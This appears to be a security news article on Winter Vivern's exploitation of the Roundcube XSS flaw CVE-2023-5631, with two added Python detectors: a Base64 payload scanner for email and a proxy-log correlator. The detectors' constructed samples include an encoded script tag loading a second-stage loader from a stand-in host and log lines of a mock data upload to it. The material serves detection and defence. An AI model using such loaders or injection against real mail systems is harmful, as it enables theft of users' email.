
Zero-Day Vulnerability in Roundcube Webmail Software Exploited by Nation State Hackers

Winter Vivern’s New Exploitation Technique

Winter Vivern, an adversarial collective linked to Belarus and Russia, exploited a zero-day vulnerability in the Roundcube webmail software on October 11, 2023. The intrusion let the group access victims’ email accounts and exfiltrate messages. Matthieu Faou, a security researcher at ESET, reported this new technique. Until then, the group had mainly exploited already-known vulnerabilities in Roundcube and Zimbra.

Previous Exploits and Their Targets

Also tracked as TA473 and UAC-0114, Winter Vivern has a history of cyberattacks. Its targets include Ukraine, Poland, and government entities in Europe and India. The group had previously exploited a different Roundcube flaw, tracked as CVE-2020-35730, which made it the second nation-state group, after APT28, to target this open-source webmail software.

Details on the Recent Vulnerability

The new vulnerability, tracked as CVE-2023-5631, is a stored cross-site scripting (XSS) flaw with a CVSS score of 5.4. It lets an attacker inject arbitrary JavaScript that runs in the context of the victim’s Roundcube session, compromising the application’s security. Roundcube released a patch for the flaw on October 14, 2023.

Attack Mechanics of Winter Vivern

Winter Vivern uses a distinct attack method. The group sends phishing emails that carry a Base64-encoded payload; once decoded, the payload injects JavaScript loaded from an external server. Because the XSS flaw fires when Roundcube renders the message, the arbitrary JavaScript is loaded and executed in the victim’s browser without any manual intervention.
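The Base64-decoding step described above is something a mail gateway or incident responder can check for directly. The following Python script is an added example written for this article (it is not Roundcube's or ESET's code): it walks a MIME message, decodes long Base64 runs found in HTML or SVG parts, and flags any run that decodes to a script tag, an inline event handler, a javascript: URI, an SVG element or a reference to an external host. The sample messages, the sender and recipient addresses and the host updates.example.invalid are constructed; checkupdate.js is the loader name the article cites.

```python
"""Find Base64-encoded script payloads hidden in HTML e-mail bodies.

Added example for this article (not Roundcube's or ESET's code).  The sample
messages and the hostname updates.example.invalid are constructed here for
illustration; the loader name checkupdate.js is the one the article cites.
"""
import base64
import re
from email import message_from_string

# A Base64 run long enough to be worth decoding; shorter tokens are noise.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# What we look for once a blob is decoded: anything that executes, or that
# pulls code from another host (the "injection from an external server").
MARKERS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"javascript:", re.I),
    "svg_element": re.compile(r"<svg\b", re.I),
    "external_url": re.compile(r"https?://", re.I),
}


def is_text(s: str) -> bool:
    """True if a decoded blob looks like text rather than an image or archive."""
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def decoded_runs(text: str):
    """Yield (blob, decoded_text) for each Base64 run that decodes to text."""
    for m in B64_RUN.finditer(text):
        blob = m.group(0)
        padded = blob + "=" * (-len(blob) % 4)   # tolerate stripped padding
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue   # binary data (inline images) or not really Base64
        if is_text(decoded):
            yield blob, decoded


def scan_html(html: str) -> list:
    """Return one finding per decoded blob that contains an active-content marker."""
    findings = []
    for blob, decoded in decoded_runs(html):
        hits = [name for name, rx in MARKERS.items() if rx.search(decoded)]
        if hits:
            findings.append({"blob": blob[:24] + "...", "markers": hits, "decoded": decoded})
    return findings


def scan_message(raw_mail: str) -> list:
    """Walk a MIME message and scan every HTML or SVG part."""
    msg = message_from_string(raw_mail)
    findings = []
    for part in msg.walk():
        if part.get_content_type() in ("text/html", "image/svg+xml"):
            body = part.get_payload(decode=True)   # undoes transfer encoding
            charset = part.get_content_charset() or "utf-8"
            findings.extend(scan_html(body.decode(charset, "replace")))
    return findings


# --- constructed samples (not real phishing messages) ----------------------
def _mail(html: str) -> str:
    return ("From: sender@example.invalid\r\nTo: victim@example.invalid\r\n"
            "Subject: constructed sample\r\nMIME-Version: 1.0\r\n"
            "Content-Type: text/html; charset=utf-8\r\n\r\n" + html)


# Blob that decodes to a tag loading a second-stage script from another host.
_LOADER = b'<script src="https://updates.example.invalid/checkupdate.js"></script>'
SUSPICIOUS_MAIL = _mail('<p>Please review the attached invoice.</p><!-- '
                        + base64.b64encode(_LOADER).decode() + ' -->')

# Benign: an inline PNG (binary, skipped) and an encoded plain-text note.
_PNG = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(range(60))).decode()
_NOTE = base64.b64encode(b"Your order number is 12345. Thank you for shopping with us!").decode()
BENIGN_MAIL = _mail(f'<img src="data:image/png;base64,{_PNG}"><p>{_NOTE}</p>')

if __name__ == "__main__":
    for label, mail in (("suspicious", SUSPICIOUS_MAIL), ("benign", BENIGN_MAIL)):
        print(label, scan_message(mail))
```

The decoder deliberately discards anything that is not UTF-8 text, so inline images and attachments do not generate noise; a blob that decodes to a script tag referencing another host is exactly the pattern the article describes and is the one finding reported for the suspicious sample.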

After the injected JavaScript runs, it loads a second-stage JavaScript loader named checkupdate.js, which in turn runs the final JavaScript payload. That last stage lets Winter Vivern exfiltrate email messages to its command-and-control server. Despite relying on relatively simple tools, Winter Vivern remains a major threat to European governments: persistent phishing campaigns, combined with the large number of outdated, vulnerable internet-facing applications, are enough to make the group effective.
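Once the loader runs in the browser, the observable trail is in egress traffic rather than on the mail server: a script fetched from a host outside the webmail origin while the Referer is the webmail page, followed by an upload from the same client to an outside host. The following Python script is an added example for this article (not ESET's detection logic) that applies this correlation to a few constructed proxy-log lines in a simplified format; mail.example.invalid and updates.example.invalid are assumed hostnames, and checkupdate.js is the loader name the article cites.

```python
"""Flag browser sessions that load script from outside the webmail origin
and then upload data to that outside host.

Added example for this article (not ESET's detection).  Log lines below are
constructed in a simplified egress-proxy format:
    <client> <unix_ts> <method> <url> <status> <request_bytes> <referer>
The hosts mail.example.invalid (webmail) and updates.example.invalid
(hostile infrastructure) are assumptions; checkupdate.js is the loader
name cited in the article.
"""
from collections import defaultdict
from urllib.parse import urlparse

WEBMAIL_HOST = "mail.example.invalid"
WINDOW_SECONDS = 300   # how long after a foreign script load we watch for uploads
UPLOAD_BYTES = 4096    # request body size that counts as "sending something out"

# Constructed sample: client 10.0.0.5 is compromised, 10.0.0.7 is normal use.
LOG_LINES = """\
10.0.0.5 1697000000 GET https://mail.example.invalid/?_task=mail 200 312 -
10.0.0.5 1697000003 GET https://updates.example.invalid/checkupdate.js 200 0 https://mail.example.invalid/?_task=mail
10.0.0.5 1697000009 POST https://updates.example.invalid/upload 200 48213 https://mail.example.invalid/?_task=mail
10.0.0.7 1697000010 GET https://mail.example.invalid/?_task=mail 200 290 -
10.0.0.7 1697000012 GET https://mail.example.invalid/skins/elastic/ui.js 200 0 https://mail.example.invalid/?_task=mail
10.0.0.7 1697000040 POST https://mail.example.invalid/?_task=mail&_action=send 200 5100 https://mail.example.invalid/?_task=mail
"""


def parse(line: str) -> dict:
    """Split one constructed log line into a record."""
    client, ts, method, url, status, nbytes, referer = line.split()
    return {"client": client, "ts": int(ts), "method": method, "url": url,
            "host": urlparse(url).hostname, "status": int(status),
            "bytes": int(nbytes), "referer": referer}


def from_webmail(rec: dict) -> bool:
    """True if the request was issued by a page served from the webmail origin."""
    return rec["referer"] != "-" and urlparse(rec["referer"]).hostname == WEBMAIL_HOST


def detect(lines) -> list:
    """Return (alert_type, client, url) tuples.

    foreign_script: a .js resource loaded from a non-webmail host by the
                    webmail page (the second-stage loader pattern).
    upload_after_foreign_script: a sizeable POST to a non-webmail host from
                    the same client within WINDOW_SECONDS of such a load.
    """
    alerts = []
    script_seen = defaultdict(list)   # client -> timestamps of foreign script loads
    for rec in (parse(l) for l in lines if l.strip()):
        if not from_webmail(rec) or rec["host"] == WEBMAIL_HOST:
            continue   # own-origin traffic is expected and not of interest here
        if rec["method"] == "GET" and rec["url"].split("?")[0].endswith(".js"):
            script_seen[rec["client"]].append(rec["ts"])
            alerts.append(("foreign_script", rec["client"], rec["url"]))
        elif rec["method"] == "POST" and rec["bytes"] >= UPLOAD_BYTES:
            recent = [t for t in script_seen[rec["client"]]
                      if rec["ts"] - t <= WINDOW_SECONDS]
            if recent:
                alerts.append(("upload_after_foreign_script", rec["client"], rec["url"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(LOG_LINES.splitlines()):
        print(*alert)
```

The first rule alone will fire on legitimate third-party scripts if the webmail deployment uses any, so the second rule, which requires a large outbound POST to a foreign host shortly after the foreign script load, is the one worth paging on; the normal client in the sample triggers neither because all of its traffic stays on the webmail origin.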
